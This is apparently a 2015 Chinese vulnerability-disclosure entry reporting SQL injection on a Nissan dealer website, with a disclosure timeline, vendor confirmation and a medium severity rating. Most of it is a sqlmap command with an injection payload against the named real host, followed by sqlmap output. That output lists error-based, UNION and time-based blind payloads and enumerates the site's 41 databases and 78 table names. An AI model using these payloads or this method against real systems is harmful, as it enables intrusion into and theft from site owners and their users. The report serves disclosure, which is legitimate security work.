2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
# sqlmap -u "http://anhui.zznissan.com.cn//ajax_default_series.php?models=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(85)%2cCHAR(87)%2cCHAR(66)%2cCHAR(121)%2cCHAR(103)%2cCHAR(55)%2cCHAR(120)%2cCHAR(87))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))" --level=5 --risk=3
可跨库查询
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-3995 OR (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7168686971,(SELECT (CASE WHEN (5906=5906) THEN 1 ELSE 0 END)),0x71636b7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- WpzQ),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: UNION query Title: MySQL UNION query (random number) - 2 columns Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-6888 UNION ALL SELECT 8302,CONCAT(0x7168686971,0x786c6159636e7a504752,0x71636b7971),8302#),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-1073 OR 2522=SLEEP(5)-- FZBc),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1))---web application technology: Apacheback-end DBMS: MySQL 5.0current database: 'zznissan_pro'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-3995 OR (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7168686971,(SELECT (CASE WHEN (5906=5906) THEN 1 ELSE 0 END)),0x71636b7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- WpzQ),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: UNION query Title: MySQL UNION query (random number) - 2 columns Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-6888 UNION ALL SELECT 8302,CONCAT(0x7168686971,0x786c6159636e7a504752,0x71636b7971),8302#),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-1073 OR 2522=SLEEP(5)-- FZBc),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1))---web application technology: Apacheback-end DBMS: MySQL 5.0available databases [41]:[*] club_15[*] ebuy[*] ebuy1217[*] events[*] events_2014cgr[*] events_2014five[*] events_pickupStory[*] ezznissan[*] information_schema[*] innodb[*] jinzhiwen[*] maintain[*] mysql[*] nissan[*] nissan_2015cgr[*] nissan_jxs[*] nissan_patrol[*] nissanmedia[*] nissantest[*] paladin[*] paladinclub[*] paladinclubtemp[*] palaqi[*] performance_schema[*] specialcar[*] test[*] topic[*] tower_15[*] wqw_five[*] wqw_mx6gc[*] wqw_succk[*] xuhui[*] yaguan[*] zznissan[*] zznissan_eng[*] zznissan_jnds[*] zznissan_lms2015[*] zznissan_mx6sj2015[*] zznissan_mx6tg2015[*] zznissan_pro[*] zznissanbaksqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-3995 OR (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7168686971,(SELECT (CASE WHEN (5906=5906) THEN 1 ELSE 0 END)),0x71636b7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- WpzQ),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: UNION query Title: MySQL UNION query (random number) - 2 columns Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-6888 UNION ALL SELECT 8302,CONCAT(0x7168686971,0x786c6159636e7a504752,0x71636b7971),8302#),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://anhui.zznissan.com.cn:80//ajax_default_series.php?models=-1073 OR 2522=SLEEP(5)-- FZBc),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(87),CHAR(66),CHAR(121),CHAR(103),CHAR(55),CHAR(120),CHAR(87)),floor(rand()2))x from (select 1 union select 2)a group by x limit 1))---web application technology: Apacheback-end DBMS: MySQL 5.0Database: zznissan[78 tables]+-------------------+| Recruitment || user || act_article || act_category || article || article1029 || brandpicture || car_adimg || car_brand || car_carimg || car_config || car_detail || car_drive || car_drivehouse || car_getinfo || car_leixing || car_models || car_modelsinfo || car_norms || car_parameter || car_seat || car_series || car_seriesinfo || car_spec || car_speed || car_standard || car_structure || car_user || car_userfun || car_usergroup || car_view || category || department || displacement || downcategory || download || dqcategory || ecatalog || energy_config || energy_detail || energy_images || energy_memory || energy_notice || energy_parameter || energy_picture || energy_series || energy_seriesinfo || energy_video || energy_view || feedback || get_active || imagefile || imgcategory || jxs_getinfo || login_record || memory || mobilepicture || mx6_dealer || mx6_testdrive || mx6_user || picture || price || purecategory || puregoods || rencai || service || service_bak || sessions || survey || telents || topic || userfun || usergroup || view_Carprice || view_models || view_models_test || view_parameter || zhaopin |+-------------------+
过滤相关参数
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 16:59
已确认漏洞存在,谢谢关注
暂无